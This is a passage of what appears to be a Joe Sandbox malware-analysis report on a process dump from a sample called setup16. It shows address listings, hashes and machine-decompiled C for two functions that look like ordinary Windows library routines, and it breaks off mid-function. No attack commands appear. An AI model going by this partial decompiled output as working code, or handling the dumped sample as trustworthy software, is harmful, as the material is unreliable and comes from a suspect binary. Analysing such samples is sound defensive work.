                                                                                                                                                                                                        0x04a32cdd
                                                                                                                                                                                                        0x049ebabb
                                                                                                                                                                                                        0x049ebabc
                                                                                                                                                                                                        0x049ebac2
                                                                                                                                                                                                        0x049ebac3
                                                                                                                                                                                                        0x049ebac3
                                                                                                                                                                                                        0x049ebac6
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049eb9dd
                                                                                                                                                                                                        0x049eb9dd
                                                                                                                                                                                                        0x049eb9e7
                                                                                                                                                                                                        0x049eb9e7
                                                                                                                                                                                                        0x049eb9ec
                                                                                                                                                                                                        0x049eb9ec
                                                                                                                                                                                                        0x049eb9f1
                                                                                                                                                                                                        0x049eb9f5
                                                                                                                                                                                                        0x049eb9fa
                                                                                                                                                                                                        0x049eba00
                                                                                                                                                                                                        0x049eba0c
                                                                                                                                                                                                        0x049eba10
                                                                                                                                                                                                        0x049eba10
                                                                                                                                                                                                        0x049eba12
                                                                                                                                                                                                        0x049eba18
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049ebb26
                                                                                                                                                                                                        0x049ebb26
                                                                                                                                                                                                        0x049eba1e
                                                                                                                                                                                                        0x049eba1e
                                                                                                                                                                                                        0x049eba23
                                                                                                                                                                                                        0x049eba25
                                                                                                                                                                                                        0x049eba2c
                                                                                                                                                                                                        0x049eba30
                                                                                                                                                                                                        0x049eba35
                                                                                                                                                                                                        0x049eba35
                                                                                                                                                                                                        0x049eba41
                                                                                                                                                                                                        0x049eba46
                                                                                                                                                                                                        0x049eba4c
                                                                                                                                                                                                        0x049eba50
                                                                                                                                                                                                        0x049eba54
                                                                                                                                                                                                        0x049eba6a
                                                                                                                                                                                                        0x049eba6e
                                                                                                                                                                                                        0x049eba70
                                                                                                                                                                                                        0x049eba74
                                                                                                                                                                                                        0x049eba78
                                                                                                                                                                                                        0x049eba7a
                                                                                                                                                                                                        0x049eba7c
                                                                                                                                                                                                        0x049eba8e
                                                                                                                                                                                                        0x049eba90
                                                                                                                                                                                                        0x049eba92
                                                                                                                                                                                                        0x049ebb14
                                                                                                                                                                                                        0x049ebb14
                                                                                                                                                                                                        0x049ebb16
                                                                                                                                                                                                        0x049ebb16
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049eba7c
                                                                                                                                                                                                        0x049ebb0a
                                                                                                                                                                                                        0x049ebb0d
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049ebb0f

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 049EB9A5
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.370501493.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_49a0000_setup16.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 885266447-0
                                                                                                                                                                                                        • Opcode ID: d8b611d053d34145b4b2fc84fbbd72b5efc100abf41f87e5d03b939a0f0b2a1b
                                                                                                                                                                                                        • Instruction ID: 8d8b0b4556eb7c016751220e0bc2e6a31223707eb8e7976821b73873c7bc9878
                                                                                                                                                                                                        • Opcode Fuzzy Hash: d8b611d053d34145b4b2fc84fbbd72b5efc100abf41f87e5d03b939a0f0b2a1b
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 41513A71608341CFCB21DF2AC59092ABBE9FB88714F24896EF68597355E730F844CB92
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 049CB171 Relevance: 1.7, APIs: 1, Instructions: 166COMMONLIBRARYCODE
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 78%
                                                                                                                                                                                                        			E049CB171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
				signed int _t65;
				signed short _t69;
				intOrPtr _t70;
				signed short _t85;
				void* _t86;
				signed short _t89;
				signed short _t91;
				intOrPtr _t92;
				intOrPtr _t97;
				intOrPtr* _t98;
				signed short _t99;
				signed short _t101;
				void* _t102;
				char* _t103;
				signed short _t104;
				intOrPtr* _t110;
				void* _t111;
				void* _t114;
				intOrPtr* _t115;

				_t109 = __esi;
				_t108 = __edi;
				_t106 = __edx;
				_t95 = __ebx;
				_push(0x90);
				_push(0x4a9f7a8);
				E04A1D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
				if(__edx == 0xffffffff) {
					L6:
					_t97 =  *((intOrPtr*)(_t114 - 0x78));
					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) != 0) {
						L3:
						L4:
						return E04A1D130(_t95, _t108, _t109);
					}
					 *(_t97 + 0xfca) = _t65 | 0x00000002;
					_t108 = 0;
					_t109 = 0;
					_t95 = 0;
					__eflags = 0;
					while(1) {
						__eflags = _t95 - 0x200;
						if(_t95 >= 0x200) {
							break;
						}
						E04A0D000(0x80);
						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
						_t108 = _t115;
						_t95 = _t95 - 0xffffff80;
						_t17 = _t114 - 4;
						 *_t17 =  *(_t114 - 4) & 0x00000000;
						__eflags =  *_t17;
						_t106 =  *((intOrPtr*)(_t114 - 0x84));
						_t110 =  *((intOrPtr*)(_t114 - 0x84));
						_t102 = _t110 + 1;
						do {
							_t85 =  *_t110;
							_t110 = _t110 + 1;
							__eflags = _t85;
						} while (_t85 != 0);
						_t111 = _t110 - _t102;
						_t21 = _t95 - 1; // -129
						_t86 = _t21;
						__eflags = _t111 - _t86;
						if(_t111 > _t86) {
							_t111 = _t86;
						}
						E04A0F3E0(_t108, _t106, _t111);
						_t115 = _t115 + 0xc;
						_t103 = _t111 + _t108;
						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
						_t89 = _t95 - _t111;
						__eflags = _t89;
						_push(0);
						if(_t89 == 0) {
							L15:
							_t109 = 0xc000000d;
							goto L16;
						} else {
							__eflags = _t89 - 0x7fffffff;
							if(_t89 <= 0x7fffffff) {
								L16:
								 *(_t114 - 0x94) = _t109;
								__eflags = _t109;
								if(_t109 < 0) {
									__eflags = _t89;
									if(_t89 != 0) {
										 *_t103 = 0;
									}
									L26:
									 *(_t114 - 0xa0) = _t109;
									 *(_t114 - 4) = 0xfffffffe;
									__eflags = _t109;
									if(_t109 >= 0) {
										L31:
										_t98 = _t108;
										_t39 = _t98 + 1; // 0x1
										_t106 = _t39;
										do {
											_t69 =  *_t98;
											_t98 = _t98 + 1;
											__eflags = _t69;
										} while (_t69 != 0);
										_t99 = _t98 - _t106;
										__eflags = _t99;
										L34:
										_t70 =  *[fs:0x30];
										__eflags =  *((char*)(_t70 + 2));
										if( *((char*)(_t70 + 2)) != 0) {
											L40:
											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x64)) = 2;
											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
											 *(_t114 - 4) = 1;
											_push(_t114 - 0x74);
											L04A1DEF0(_t99, _t106);
											 *(_t114 - 4) = 0xfffffffe;
											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
											goto L3;
										}
										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
										if(( *0x7ffe02d4 & 0x00000003) != 3) {
											goto L40;
										}
										_push( *((intOrPtr*)(_t114 + 8)));
										_push( *((intOrPtr*)(_t114 - 0x9c)));
										_push(_t99 & 0x0000ffff);
										_push(_t108);
										_push(1);
										_t101 = E04A0B280();
										__eflags =  *((char*)(_t114 + 0x14)) - 1;
										if( *((char*)(_t114 + 0x14)) == 1) {
											__eflags = _t101 - 0x80000003;
											if(_t101 == 0x80000003) {
												E04A0B7E0(1);
												_t101 = 0;
												__eflags = 0;
											}
										}
										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
										goto L4;
									}
									__eflags = _t109 - 0x80000005;
									if(_t109 == 0x80000005) {
										continue;
									}
									break;
								}
								 *(_t114 - 0x90) = 0;
								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
								_t91 = E04A0E2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
								_t115 = _t115 + 0x10;
								_t104 = _t91;
								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
								__eflags = _t104;
								if(_t104 < 0) {
									L21:
									_t109 = 0x80000005;
									 *(_t114 - 0x90) = 0x80000005;
									L22:
									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
									L23:
									 *(_t114 - 0x94) = _t109;
									goto L26;
								}
								__eflags = _t104 - _t92;
								if(__eflags > 0) {
									goto L21;
								}
								if(__eflags == 0) {
									goto L22;
								}
								goto L23;
							}
							goto L15;
						}
					}
					__eflags = _t109;
					if(_t109 >= 0) {
						goto L31;
					}
					__eflags = _t109 - 0x80000005;
					if(_t109 != 0x80000005) {
						goto L31;
					}
					 *((short*)(_t95 + _t108 - 2)) = 0xa;
					_t38 = _t95 - 1; // -129
					_t99 = _t38;
					goto L34;
				}
				if( *((char*)( *[fs:0x30] + 2)) != 0) {
					__eflags = __edx - 0x65;
					if(__edx != 0x65) {
						goto L2;
					}
					goto L6;
				}
				L2:
				_push( *((intOrPtr*)(_t114 + 8)));
				_push(_t106);
				if(E04A0A890() != 0) {
					goto L6;
				}
				goto L3;
			}






















                                                                                                                                                                                                        0x049cb171
                                                                                                                                                                                                        0x049cb171
                                                                                                                                                                                                        0x049cb171
                                                                                                                                                                                                        0x049cb171
                                                                                                                                                                                                        0x049cb171
                                                                                                                                                                                                        0x049cb176
                                                                                                                                                                                                        0x049cb17b
                                                                                                                                                                                                        0x049cb180
                                                                                                                                                                                                        0x049cb186
                                                                                                                                                                                                        0x049cb18f
                                                                                                                                                                                                        0x049cb198
                                                                                                                                                                                                        0x049cb1a4
                                                                                                                                                                                                        0x049cb1aa
                                                                                                                                                                                                        0x04a24802
                                                                                                                                                                                                        0x04a24802
                                                                                                                                                                                                        0x04a24805
                                                                                                                                                                                                        0x04a2480c
                                                                                                                                                                                                        0x04a2480e
                                                                                                                                                                                                        0x049cb1d1
                                                                                                                                                                                                        0x049cb1d3
                                                                                                                                                                                                        0x049cb1de
                                                                                                                                                                                                        0x049cb1de
                                                                                                                                                                                                        0x04a24817
                                                                                                                                                                                                        0x04a2481e
                                                                                                                                                                                                        0x04a24820
                                                                                                                                                                                                        0x04a24822
                                                                                                                                                                                                        0x04a24822
                                                                                                                                                                                                        0x04a24824
                                                                                                                                                                                                        0x04a24824
                                                                                                                                                                                                        0x04a2482a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a24835
                                                                                                                                                                                                        0x04a2483a
                                                                                                                                                                                                        0x04a2483d
                                                                                                                                                                                                        0x04a2483f
                                                                                                                                                                                                        0x04a24842
                                                                                                                                                                                                        0x04a24842
                                                                                                                                                                                                        0x04a24842
                                                                                                                                                                                                        0x04a24846
                                                                                                                                                                                                        0x04a2484c
                                                                                                                                                                                                        0x04a2484e
                                                                                                                                                                                                        0x04a24851
                                                                                                                                                                                                        0x04a24851
                                                                                                                                                                                                        0x04a24853
                                                                                                                                                                                                        0x04a24854
                                                                                                                                                                                                        0x04a24854
                                                                                                                                                                                                        0x04a24858
                                                                                                                                                                                                        0x04a2485a
                                                                                                                                                                                                        0x04a2485a
                                                                                                                                                                                                        0x04a2485d
                                                                                                                                                                                                        0x04a2485f
                                                                                                                                                                                                        0x04a24861
                                                                                                                                                                                                        0x04a24861
                                                                                                                                                                                                        0x04a24866
                                                                                                                                                                                                        0x04a2486b
                                                                                                                                                                                                        0x04a2486e
                                                                                                                                                                                                        0x04a24871
                                                                                                                                                                                                        0x04a24876
                                                                                                                                                                                                        0x04a24876
                                                                                                                                                                                                        0x04a24878
                                                                                                                                                                                                        0x04a2487b
                                                                                                                                                                                                        0x04a24884
                                                                                                                                                                                                        0x04a24884
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a2487d
                                                                                                                                                                                                        0x04a2487d
                                                                                                                                                                                                        0x04a24882
                                                                                                                                                                                                        0x04a24889
                                                                                                                                                                                                        0x04a24889
                                                                                                                                                                                                        0x04a2488f
                                                                                                                                                                                                        0x04a24891
                                                                                                                                                                                                        0x04a248e0
                                                                                                                                                                                                        0x04a248e2
                                                                                                                                                                                                        0x04a248e4
                                                                                                                                                                                                        0x04a248e4
                                                                                                                                                                                                        0x04a248e7
                                                                                                                                                                                                        0x04a248e7
                                                                                                                                                                                                        0x04a248ed
                                                                                                                                                                                                        0x04a248f4
                                                                                                                                                                                                        0x04a248f6
                                                                                                                                                                                                        0x04a24951
                                                                                                                                                                                                        0x04a24951
                                                                                                                                                                                                        0x04a24953
                                                                                                                                                                                                        0x04a24953
                                                                                                                                                                                                        0x04a24956
                                                                                                                                                                                                        0x04a24956
                                                                                                                                                                                                        0x04a24958
                                                                                                                                                                                                        0x04a24959
                                                                                                                                                                                                        0x04a24959
                                                                                                                                                                                                        0x04a2495d
                                                                                                                                                                                                        0x04a2495d
                                                                                                                                                                                                        0x04a2495f
                                                                                                                                                                                                        0x04a2495f
                                                                                                                                                                                                        0x04a24965
                                                                                                                                                                                                        0x04a24969
                                                                                                                                                                                                        0x04a249ba
                                                                                                                                                                                                        0x04a249ba
                                                                                                                                                                                                        0x04a249c1
                                                                                                                                                                                                        0x04a249c5
                                                                                                                                                                                                        0x04a249cc
                                                                                                                                                                                                        0x04a249d4
                                                                                                                                                                                                        0x04a249d7
                                                                                                                                                                                                        0x04a249da
                                                                                                                                                                                                        0x04a249e4
                                                                                                                                                                                                        0x04a249e5
                                                                                                                                                                                                        0x04a249f3
                                                                                                                                                                                                        0x04a24a02
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a24a02
                                                                                                                                                                                                        0x04a24972
                                                                                                                                                                                                        0x04a24974
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a24976
                                                                                                                                                                                                        0x04a24979
                                                                                                                                                                                                        0x04a24982
                                                                                                                                                                                                        0x04a24983
                                                                                                                                                                                                        0x04a24984
                                                                                                                                                                                                        0x04a2498b
                                                                                                                                                                                                        0x04a2498d
                                                                                                                                                                                                        0x04a24991
                                                                                                                                                                                                        0x04a24993
                                                                                                                                                                                                        0x04a24999
                                                                                                                                                                                                        0x04a2499d
                                                                                                                                                                                                        0x04a249a2
                                                                                                                                                                                                        0x04a249a2
                                                                                                                                                                                                        0x04a249a2
                                                                                                                                                                                                        0x04a24999
                                                                                                                                                                                                        0x04a249ac
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a249b3
                                                                                                                                                                                                        0x04a248f8
                                                                                                                                                                                                        0x04a248fe
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a248fe
                                                                                                                                                                                                        0x04a24895
                                                                                                                                                                                                        0x04a2489c
                                                                                                                                                                                                        0x04a248ad
                                                                                                                                                                                                        0x04a248b2
                                                                                                                                                                                                        0x04a248b5
                                                                                                                                                                                                        0x04a248b7
                                                                                                                                                                                                        0x04a248ba
                                                                                                                                                                                                        0x04a248bc
                                                                                                                                                                                                        0x04a248c6
                                                                                                                                                                                                        0x04a248c6
                                                                                                                                                                                                        0x04a248cb
                                                                                                                                                                                                        0x04a248d1
                                                                                                                                                                                                        0x04a248d4
                                                                                                                                                                                                        0x04a248d8
                                                                                                                                                                                                        0x04a248d8
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a248d8
                                                                                                                                                                                                        0x04a248be
                                                                                                                                                                                                        0x04a248c0
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a248c2
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a248c4
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a24882
                                                                                                                                                                                                        0x04a2487b
                                                                                                                                                                                                        0x04a24904
                                                                                                                                                                                                        0x04a24906
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a24908
                                                                                                                                                                                                        0x04a2490e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a24910
                                                                                                                                                                                                        0x04a24917
                                                                                                                                                                                                        0x04a24917
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a24917
                                                                                                                                                                                                        0x049cb1ba
                                                                                                                                                                                                        0x04a247f9
                                                                                                                                                                                                        0x04a247fc
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a247fc
                                                                                                                                                                                                        0x049cb1c0
                                                                                                                                                                                                        0x049cb1c0
                                                                                                                                                                                                        0x049cb1c3
                                                                                                                                                                                                        0x049cb1cb
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.370501493.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_49a0000_setup16.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: _vswprintf_s
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 677850445-0
                                                                                                                                                                                                        • Opcode ID: 46c20e8130aea6593830d6664e2c25e60798001b9e93077df35515d90c38039f
                                                                                                                                                                                                        • Instruction ID: ac917e1073f1564b2a1bfba0d666e7ce369470979be105e144ea77bdccc3822f
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 46c20e8130aea6593830d6664e2c25e60798001b9e93077df35515d90c38039f
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9051F371D102798FEB31CF68CA40BAEBBB0AF08714F1041ADE859AB281D3706941AB91
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 049F2581 Relevance: 1.6, Strings: 1, Instructions: 329COMMONCrypto
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 84%
                                                                                                                                                                                                        			E049F2581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24) {
				signed int _v8;
				signed int _v16;
				unsigned int _v24;
				void* _v28;
				signed int _v32;
				unsigned int _v36;
				void* _v37;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _t233;
				signed int _t237;
				intOrPtr _t241;
				intOrPtr _t242;
				intOrPtr _t246;
				signed int _t250;
				signed int _t252;
				intOrPtr _t254;
				signed int _t257;
				signed int _t264;
				signed int _t267;
				signed int _t275;
				signed int _t281;
				signed int _t283;
				void* _t286;
				void* _t287;
				signed int _t288;
				unsigned int _t291;
				signed int _t295;
				signed int _t297;
				signed int _t301;
				intOrPtr _t313;
				signed int _t322;
				signed int _t324;
				signed int _t325;
				signed int _t329;
				signed int _t330;
				signed int _t332;
				signed int _t334;
				signed int _t336;
				void* _t337;
				void* _t339;
				void* _t340;

				_t334 = _t336;
				_t337 = _t336 - 0x4c;
				_v8 =  *0x4abd360 ^ _t334;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t329 = 0x4abb2e8;
				_v56 = _a4;
				_v48 = __edx;
				_v60 = __ecx;
				_t291 = 0;
				_v80 = 0;
				asm("movsd");
				_v64 = 0;
				_v76 = 0;
				_v72 = 0;
				asm("movsd");
				_v44 = 0;
				_v52 = 0;
				_v68 = 0;
				asm("movsd");
				_v32 = 0;
				_v36 = 0;
				asm("movsd");
				_v16 = 0;
				_t340 = (_v24 >> 0x0000001c & 0x00000003) - 1;
				_t281 = 0x48;
				_t311 = 0 | _t340 == 0x00000000;
				_t322 = 0;
				_v37 = _t340 == 0;
				if(_v48 <= 0) {
					L16:
					_t45 = _t281 - 0x48; // 0x0
					__eflags = _t45 - 0xfffe;
					if(_t45 > 0xfffe) {
						_t330 = 0xc0000106;
						goto L32;
					} else {
						_t329 = L049E4620(_t291,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t281);
						_v52 = _t329;
						__eflags = _t329;
						if(_t329 == 0) {
							_t330 = 0xc0000017;
							goto L32;
						} else {
							 *(_t329 + 0x44) =  *(_t329 + 0x44) & 0x00000000;
							_t50 = _t329 + 0x48; // 0x48
							_t324 = _t50;
							_t311 = _v32;
							 *(_t329 + 0x3c) = _t281;
							_t283 = 0;
							 *((short*)(_t329 + 0x30)) = _v48;
							__eflags = _t311;
							if(_t311 != 0) {
								 *(_t329 + 0x18) = _t324;
								__eflags = _t311 - 0x4ab8478;
								 *_t329 = ((0 | _t311 == 0x04ab8478) - 0x00000001 & 0xfffffffb) + 7;
								E04A0F3E0(_t324,  *((intOrPtr*)(_t311 + 4)),  *_t311 & 0x0000ffff);
								_t311 = _v32;
								_t337 = _t337 + 0xc;
								_t283 = 1;
								__eflags = _a8;
								_t324 = _t324 + (( *_t311 & 0x0000ffff) >> 1) * 2;
								if(_a8 != 0) {
									_t275 = E04A539F2(_t324);
									_t311 = _v32;
									_t324 = _t275;
								}
							}
							_t295 = 0;
							_v16 = 0;
							__eflags = _v48;
							if(_v48 <= 0) {
								L31:
								_t330 = _v68;
								__eflags = 0;
								 *((short*)(_t324 - 2)) = 0;
								goto L32;
							} else {
								_t281 = _t329 + _t283 * 4;
								_v56 = _t281;
								do {
									__eflags = _t311;
									if(_t311 != 0) {
										_t233 =  *(_v60 + _t295 * 4);
										__eflags = _t233;
										if(_t233 == 0) {
											goto L30;
										} else {
											__eflags = _t233 == 5;
											if(_t233 == 5) {
												goto L30;
											} else {
												goto L22;
											}
										}
									} else {
										L22:
										 *_t281 =  *(_v60 + _t295 * 4);
										 *(_t281 + 0x18) = _t324;
										_t237 =  *(_v60 + _t295 * 4);
										__eflags = _t237 - 8;
										if(_t237 > 8) {
											goto L56;
										} else {
											switch( *((intOrPtr*)(_t237 * 4 +  &M049F2959))) {
												case 0:
													__ax =  *0x4ab8488;
													__eflags = __ax;
													if(__ax == 0) {
														goto L29;
													} else {
														__ax & 0x0000ffff = E04A0F3E0(__edi,  *0x4ab848c, __ax & 0x0000ffff);
														__eax =  *0x4ab8488 & 0x0000ffff;
														goto L26;
													}
													goto L108;
												case 1:
													L45:
													E04A0F3E0(_t324, _v80, _v64);
													_t270 = _v64;
													goto L26;
												case 2:
													 *0x4ab8480 & 0x0000ffff = E04A0F3E0(__edi,  *0x4ab8484,  *0x4ab8480 & 0x0000ffff);
													__eax =  *0x4ab8480 & 0x0000ffff;
													__eax = ( *0x4ab8480 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													goto L28;
												case 3:
													__eax = _v44;
													__eflags = __eax;
													if(__eax == 0) {
														goto L29;
													} else {
														__esi = __eax + __eax;
														__eax = E04A0F3E0(__edi, _v72, __esi);
														__edi = __edi + __esi;
														__esi = _v52;
														goto L27;
													}
													goto L108;
												case 4:
													_push(0x2e);
													_pop(__eax);
													 *(__esi + 0x44) = __edi;
													 *__edi = __ax;
													__edi = __edi + 4;
													_push(0x3b);
													_pop(__eax);
													 *(__edi - 2) = __ax;
													goto L29;
												case 5:
													__eflags = _v36;
													if(_v36 == 0) {
														goto L45;
													} else {
														E04A0F3E0(_t324, _v76, _v36);
														_t270 = _v36;
													}
													L26:
													_t337 = _t337 + 0xc;
													_t324 = _t324 + (_t270 >> 1) * 2 + 2;
													__eflags = _t324;
													L27:
													_push(0x3b);
													_pop(_t272);
													 *((short*)(_t324 - 2)) = _t272;
													goto L28;
												case 6:
													__ebx = "\\WWw\\WWw";
													__eflags = __ebx - "\\WWw\\WWw";
													if(__ebx != "\\WWw\\WWw") {
														_push(0x3b);
														_pop(__esi);
														do {
															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
															E04A0F3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
															__edi = __edi + __eax * 2;
															__edi = __edi + 2;
															 *(__edi - 2) = __si;
															__ebx =  *__ebx;
															__eflags = __ebx - "\\WWw\\WWw";
														} while (__ebx != "\\WWw\\WWw");
														__esi = _v52;
														__ecx = _v16;
														__edx = _v32;
													}
													__ebx = _v56;
													goto L29;
												case 7:
													 *0x4ab8478 & 0x0000ffff = E04A0F3E0(__edi,  *0x4ab847c,  *0x4ab8478 & 0x0000ffff);
													__eax =  *0x4ab8478 & 0x0000ffff;
													__eax = ( *0x4ab8478 & 0x0000ffff) >> 1;
													__eflags = _a8;
													__edi = __edi + __eax * 2;
													if(_a8 != 0) {
														__ecx = __edi;
														__eax = E04A539F2(__ecx);
														__edi = __eax;
													}
													goto L28;
												case 8:
													__eax = 0;
													 *(__edi - 2) = __ax;
													 *0x4ab6e58 & 0x0000ffff = E04A0F3E0(__edi,  *0x4ab6e5c,  *0x4ab6e58 & 0x0000ffff);
													 *(__esi + 0x38) = __edi;
													__eax =  *0x4ab6e58 & 0x0000ffff;
													__eax = ( *0x4ab6e58 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													__edi = __edi + 2;
													L28:
													_t295 = _v16;
													_t311 = _v32;
													L29:
													_t281 = _t281 + 4;
													__eflags = _t281;
													_v56 = _t281;
													goto L30;
											}
										}
									}
									goto L108;
									L30:
									_t295 = _t295 + 1;
									_v16 = _t295;
									__eflags = _t295 - _v48;
								} while (_t295 < _v48);
								goto L31;
							}
						}
					}
				} else {
					while(1) {
						L1:
						_t237 =  *(_v60 + _t322 * 4);
						if(_t237 > 8) {
							break;
						}
						switch( *((intOrPtr*)(_t237 * 4 +  &M049F2935))) {
							case 0:
								__ax =  *0x4ab8488;
								__eflags = __ax;
								if(__ax != 0) {
									__eax = __ax & 0x0000ffff;
									__ebx = __ebx + 2;
									__eflags = __ebx;
									goto L53;
								}
								goto L14;
							case 1:
								L44:
								_t311 =  &_v64;
								_v80 = E049F2E3E(0,  &_v64);
								_t281 = _t281 + _v64 + 2;
								goto L13;
							case 2:
								__eax =  *0x4ab8480 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x4ab8480;
									goto L80;
								}
								goto L14;
							case 3:
								__eax = E049DEEF0(0x4ab79a0);
								__eax =  &_v44;
								_push(__eax);
								_push(0);
								_push(0);
								_push(4);
								_push(L"PATH");
								_push(0);
								L57();
								__esi = __eax;
								_v68 = __esi;
								__eflags = __esi - 0xc0000023;
								if(__esi != 0xc0000023) {
									L10:
									__eax = E049DEB70(__ecx, 0x4ab79a0);
									__eflags = __esi - 0xc0000100;
									if(__esi == 0xc0000100) {
										_v44 = _v44 & 0x00000000;
										__eax = 0;
										_v68 = 0;
										goto L13;
									} else {
										__eflags = __esi;
										if(__esi < 0) {
											L32:
											_t211 = _v72;
											__eflags = _t211;
											if(_t211 != 0) {
												L049E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t211);
											}
											_t212 = _v52;
											__eflags = _t212;
											if(_t212 != 0) {
												__eflags = _t330;
												if(_t330 < 0) {
													L049E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t212);
													_t212 = 0;
												}
											}
											goto L36;
										} else {
											__eax = _v44;
											__ebx = __ebx + __eax * 2;
											__ebx = __ebx + 2;
											__eflags = __ebx;
											L13:
											_t291 = _v36;
											goto L14;
										}
									}
								} else {
									__eax = _v44;
									__ecx =  *0x4ab7b9c; // 0x0
									_v44 + _v44 =  *[fs:0x30];
									__ecx = __ecx + 0x180000;
									__eax = L049E4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
									_v72 = __eax;
									__eflags = __eax;
									if(__eax == 0) {
